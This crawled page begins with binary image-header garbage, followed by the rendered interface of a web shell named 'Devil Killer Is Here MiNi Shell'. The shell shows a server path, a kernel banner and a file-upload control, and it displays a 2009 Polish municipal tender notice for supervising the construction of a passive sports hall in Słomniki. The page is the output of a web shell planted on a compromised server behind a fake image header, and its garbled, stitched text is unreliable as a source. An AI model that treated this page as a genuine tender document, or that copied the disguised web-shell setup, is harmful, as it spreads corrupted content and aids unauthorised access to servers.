JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090605/181714-N-2009.html

<p class="kh_header"><b>Słomniki: Usługa pełnienia funkcji inspektora nadzoru inwestorskiego nad realizacją robót budowlanych w zakresie zadania:
Budowa hali rekreacyjno -sportowej w Słomnikach na działkach 640/3 i 402/12</b><br>
<b>Numer ogłoszenia: 181714 - 2009; data zamieszczenia: 05.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Słomniki , ul. Kościuszki 64, 32-090 Słomniki, woj. małopolskie, tel. 012 3881102, faks 012 3882102.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.slomniki.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa pełnienia funkcji inspektora nadzoru inwestorskiego nad realizacją robót budowlanych w zakresie zadania:
Budowa hali rekreacyjno -sportowej w Słomnikach na działkach 640/3 i 402/12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Usługa pełnienia funkcji inspektora  nadzoru inwestorskiego nad realizacją robót   
budowlanych w zakresie zadania: Budowa hali rekreacyjno -sportowej w Słomnikach na działkach 640/3 i 402/12 zgodnie z pozwoleniem na budowę nr AB.V-1-587/08, wydanym przez Starostę Krakowskiego z dnia 26 sierpnia 2008 roku.
Przedmiotem zamówienia jest pełnienie nadzoru inwestorskiego przy realizacji  przez wykonawcę  robót budowlanych, polegających na wybudowaniu HALI REKREACYJNO-SPORTOWEJ w systemie pasywnym wraz z infrastrukturą techniczną oraz z zagospodarowaniem najbliższego otoczenia na działce nr 640/3 i 402/12 przy ul. Świerczewskiego w Słomnikach przez zespół inspektorów posiadających  wymagane uprawnienia t.j.  uprawnienia  budowlane do kierowania robotami budowlanymi  wraz z przynależnością  do właściwej Izby Samorządu Zawodowego w następujących branżach:
- konstrukcyjno-budowlanej
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych
- instalacji w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
2.  Charakterystyka budynku.
 Budynek posiada jedną kondygnację nadziemną.
W budynku zlokalizowano następujące funkcje:
- wielofunkcyjna arena sportowa o boisku 22x44m z trybunami dla ok.240 widzów i 30 zawodników; z poziomu trybun dostępne toalety oraz wentylatornia.
- zaplecza szatniowo-sanitarne z pomieszczeniami towarzyszącymi takimi, jak hol główny, pokój trenera, siłownia, pokój masażu, pomieszczenia techniczne i magazynowe.
Powierzchnia zabudowy projektowanych obiektów: 1740m2 Razem powierzchnia netto:  1 755,06m2. Kubatura brutto kondygnacji naziemnych: 14 585m3. Wysokość (do określenia warunków technicznych): 10,50m
Warunki posadowienia budynku zgodnie z ekspertyzą geotechniczną przy prostych warunkach geotechnicznych są zaliczone do I kategorii geotechnicznej. Konstrukcja budynku: ławy i stopy fundamentowe żelbetowe, ściany w szkielecie żelbetowym wypełnianym bloczkami silikatowymi, dach z wiązarów z drewna klejonego. Ściany ocieplane styropianem o gr.30cm, a następnie tynkowane. Dach pokryty 40cm twardej wełny mineralnej na blasze trapezowej, a następnie kryty papą termozgrzewalną.  
Budynek wyposażono w instalacje:
-wodociągową
-gazową z kotłownią gazową
-kanalizacyjną sanitarną
-kanalizacyjną opadową
-ogrzewania podłogowego
-wentylacji mechanicznej z odzyskiem ciepła
-elektryczną
-teletechniczną - telefony, internet, audio-wideo
-odgromową
Budynek został wyposażony w składane wyposażenie sportowe - kosze do gry, kurtyny dzielące boiska. Dodatkowo przewiduje się montaż ścianki wspinaczkowej wewnętrznej i zewnętrznej.
Budynek zaprojektowano w standardzie budynku pasywnego, o wysokiej termoizolacyjności przegród zewnętrznych i bardzo niskim zużyciu energii na cele grzewcze na poziomie ok.15kWh/m2rok. Zakładane parametry przegród to ok.0,1 W/m2K, a zestawów okiennych 0,8W/m2K. Dodatkowo zakłada się wysoką szczelność budynku, która będzie wynosić nie mniej niż 0,6 1/h przy różnicy ciśnień 50Pa dla testu szczelności wykonanego zgodnie z normą PN-EN 13829. istotnym elementem oszczędności energii na cele grzewcze jest zastosowany system wentylacji mechanicznej z odzyskiem ciepła o wysokiej sprawności oraz ogrzewanie podłogowe założone dla całej powierzchni budynku.

3. Realizacja budowy hali rekreacyjno-sportowej jest współfinansowana ze środków Unii Europejskiej:

Nazwa Programu Operacyjnego: Małopolski Regionalny Program Operacyjny
Numer i nazwa Osi Priorytetowej: 6. Spójność wewnątrz regionalna
Numer i nazwa Działania: 6.1. Rozwój miast
Oznaczenie literowe i nazwa schematu: Schemat B: Projekty w zakresie rekreacji i sportu

4.  Obowiązki Inspektora ( Zespołu Inspektorów)
Do zadań Inspektora Nadzoru należy działanie w ramach obowiązków określonych w ustawie Prawo Budowlane, a także w szczególności:
1.reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności jej
realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy
technicznej,
2.sprawowanie stałego nadzoru w trakcie wykonywania robót budowlanych 
3.sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych,a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwychi niedopuszczonych do stosowania w budownictwie,
4.sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających,uczestniczenie w próbach i odbiorach technicznych instalacji, oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania,
5.potwierdzanie faktycznie wykonanych robót kontrola usunięcia wad oraz  kontrolowanie rozliczeń budowy, w tym również dokumentacji związanej z płatnościami częściowymi na rzecz wykonawcy robót budowlanych
6.współpraca z Inwestorem w zakresie przygotowania dokumentacji  niezbędnej do rozliczenia dofinansowania uzyskanego z środków MRPO, na przedmiotową inwestycję
7.posiadanie stałej łączności np. telefonicznej z Wykonawcą Robót Budowlanych i Zamawiającym
8.pokrycie kosztów dojazdów w związku z wykonywaniem przedmiotu zamówienia; 
9.obowiązkowa obecność na naradach koordynacyjnych 
            Narady koordynacyjne organizuje w imieniu Zamawiającego Zarządzający: 
a)Celem narad koordynacyjnych będzie omawianie bieżących spraw dotyczących wykonania i zaawansowania robót;
b)b) Narady koordynacyjne będą odbywały się z częstotliwością jeden raz w miesiącu, w każdy pierwszy wtorek miesiąca w siedzibie Zamawiającego w Sali obrad nr 19 od godziny 10.00. W przypadku gdy jest to dzień ustawowo wolny od pracy w pierwszym kolejnym dniu roboczym. Na wniosek ZAMAWIAJĄCEGO lub WYKONAWCY odbędzie się Narada koordynacyjna doraźna, o jej terminie i miejscu Zarządzający powiadomi wszystkich zainteresowanych na co najmniej jeden dzień przed wyznaczonym terminem. Narady koordynacyjne doraźne zwoływane są zawsze w przypadku wprowadzania zmian -z wyjątkiem sytuacji gdy zmiany są przedstawione na zwykłej wtorkowej naradzie. 
c)Narady będą prowadzone i protokołowane przez Zarządzającego, a kopia protokołu będzie przekazana przedstawicielowi WYKONAWCY .
10  Inspektor nadzoru jest upoważniony do wydawania Wykonawcy wszelkich poleceń   związanych z jakością i ilością robót objętych przedmiotem umowy. Inspektor Nadzoru ma prawo do wydawania , poleceń, które są niezbędne do prawidłowego wykonania przedmiotu zamówienia zgodnie z Umową, specyfikacjami technicznymi, projektem budowlanym i przepisami prawa budowlanego.

          5.  Rodzaje odbiorów w których  ma obowiązek uczestniczyć  inspektor nadzoru.
(1)odbiór robót zanikających i ulegających zakryciu następujący po zgłoszeniu przez Wykonawcę robót budowlanych  Inspektorowi Nadzoru;
(2)odbiór przejściowy na podstawie protokołu stanu zaawansowania robót stanowiący podstawę do wystawienia faktury przez Wykonawcę robót budowlanych
(3)odbiór końcowy po uzyskaniu prawomocnej decyzji o pozwoleniu na użytkowanie; 
(4)odbiór ostateczny następujący po terminie upływu gwarancji (Zamawiający dokona odbioru ostatecznego przedmiotu umowy w ciągu 21 dni od dnia upływu gwarancji, o której mowa w niniejszej Umowie)
(5)inne odbiory robót zgodne ze Specyfikacją Techniczną Wykonania i Odbioru Robót Budowlanych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9, 71.52.10.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 29.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wadium. Zamawiający wymaga wniesienie wadium
Ustala się wniesienie wadium w wysokości
2500,00 zł  słownie: dwa  tysiące pięćset złotych

Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1.w pieniądzu, sposób przekazania: przelew na konto zamawiającego BS Słomniki 
      39 8614 0001 0000 0000 0420 0019 
      Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uważa wadium, które 
w oznaczonym terminie (przed upływem terminu składania ofert) znajdzie się na koncie Zamawiającego - data uznania rachunku Zamawiającego (zaleca się przelew najpóźniej do dnia poprzedzającego dzień składania ofert z uwagi na operacje bankowe). 
      
Wpłacając wadium w formie przelewu w tytule  należy wpisać wadium na przetarg -: Usługa pełnienia funkcji inspektora nadzoru- Budowa hali  oraz podać nazwę Wykonawcy składającego ofertę 

2.w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym, 
3.w gwarancjach bankowych
4.w gwarancjach ubezpieczeniowych 
5.w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z p. zm.) 

sposób przekazania wadium w formie dokumentów: oryginał Kasa Urzędu Miejskiego w Słomnikach ul. Kościuszki 64, kopię należy dołączyć do oferty

4. Zwrot wadium nastąpi:
Zamawiający zwraca niezwłocznie wadium
1.po upływie terminu związania z ofertą 
2.po zawarciu umowy w sprawie zamówienia publicznego wraz z wniesieniem zabezpieczenia należytego wykonania umowy.
3.Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
Z zastrzeżeniem ust. 4A,Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy
a)który wycofał ofertę przed upływem terminu składania ofert. 
b)który został wykluczony z postępowania
c)którego oferta została odrzucona 
 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń potwierdzających spełnienie warunków udziału w postępowaniu, o których mowa w art.25 ust.1, lub pełnomocnictw chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana :
a)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie.
b)Nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
c)Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.

 W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki udziału w postępowaniu o zamówienie publiczne.
O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:
1.1	Posiadający uprawnienia do wykonywania określonej działalności lub czynności                
1.2	Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
 1.3	Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
1.4	Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia. 

2. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne
Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:
-nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4, 
-podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych.
-wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji, 
-złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania, 
-nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3, PZP	
-nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą, 

3. Zamawiający odrzuca ofertę wykonawcy:
-niezgodną z ustawą lub której treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art.87 ust.2 pkt.3 Prawa zamówień publicznych
-jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, 
-zawierającą rażąco niską cenę w stosunku do przedmiotu zamówienia,  
-została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia.
-zawiera błędy w obliczeniu ceny 
- wykonawcy który  w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych 
-nieważną na podstawie odrębnych przepisów, 

4.Ofertę wykonawcy wykluczonego uznaje się za odrzuconą
5.Zamawiający dokona oceny  spełnienia warunków udziału w postępowaniu na podstawie złożonych wraz z ofertą dokumentów potwierdzających spełnienie warunków.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki:
      -Formularz ofertowy -  z wykorzystaniem wzoru - załącznik nr 1 do SIWZ 
    - Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne-   z  wykorzystaniem wzoru - załącznik nr 2 do SIWZ 
      - Projekt umowy - parafowany z wykorzystaniem wzoru - załącznik nr 3 do SIWZ 
       -wykaz osób do kontaktów z zamawiającym odpowiedzialnych za wykonanie zobowiązań   umowy -z wykorzystaniem wzoru - załącznik nr 4 do SIWZ    

B.W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych składa następujące dokumenty:

  B.2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
   B.3) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych.  
   B.4) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert  
   B.5) Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
  B.6) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  

C.I W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty:
 
C.1) Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności.( wzór zał 5 do SIWZ)

Wymagane jest wykazanie minimum po jednej osobie posiadającej uprawnienia do kierowania i nadzorowania robotami budowlanymi wraz z dokumentem potwierdzającym  przynależność do właściwej Izby Samorządu Zawodowego w specjalnościach: 
- konstrukcyjno-budowlanej
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,   
   wodociągowych i kanalizacyjnych
- instalacji w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych

C1.1 pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie tym wykonawca wskazał osoby, którymi będzie dysponował.  

C.2) Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia t.j. uprawnienia budowlane do kierowania robotami budowlanymi  wraz z przynależnością  do właściwej Izby Samorządu Zawodowego.

C.3. Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług  w okresie ostatnich trzech  lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich wartości oraz daty i miejsca wykonania wraz z dokumentami (referencjami) potwierdzającymi, że roboty te zostały wykonane należycie:   

I- co najmniej jednej usługi polegającej na sprawowaniu nadzoru inwestorskiego dla budynku zaprojektowanego w standardzie budynku pasywnego spełniającego  poniższe parametry:
- zużyciu energii na cele grzewcze nie wyższe niż15kWh/m2/rok 
- parametry przegród zewnętrznych  na poziomie nie gorszym niż 0,1 W/m2K
- parametry zestawów okiennych na poziomie nie gorszym niż  0,8W/m2K
      - zastosowany system wentylacji mechanicznej z odzyskiem ciepła o wysokiej sprawności
Standard budynku pasywnego powinien być potwierdzony przez uprawnioną jednostkę

    II- każdy z branżowych inspektorów nadzoru powinien wykazać się realizacja nadzoru                      inwestycji o łącznej wartości nie mniejszej niż 5.000.000,00 zł brutto w branżach:
1. konstrukcyjno-budowlanej	
      2.instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,    gazowych, wodociągowych i kanalizacyjnych
3.instalacji w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych

 C.II W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego należy złożyć następujące dokumenty

- Wykonawca musi wykazać się potwierdzeniem odbycia szkolenia ( zaświadczenie lub równoważny dokument) z przeprowadzenia prób szczelności powietrznej budynku zgodnie z PN EN 13829.

D.W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty:
  D.1) -Polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.  

E. Wykonawca  zamieszkały poza terytorium Rzeczypospolitej Polskiej:

 E.1) Zamiast dokumentów, o których mowa w pkt. B.2), B.4), B.6) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu.
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu 

E.2) Zamiast dokumentu, o którym mowa w pkt. B.6) składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu. 
  -Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. E zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. E.   

F. Dokumenty wymagane w przypadku składania oferty wspólnej: 

  - Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. VI B dla każdego  partnera z osobna, pozostałe dokumenty składane są wspólnie   

Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem -za zgodność z oryginałem.

Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.slomniki.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Słomniki Urząd Miejski w Słomnikach
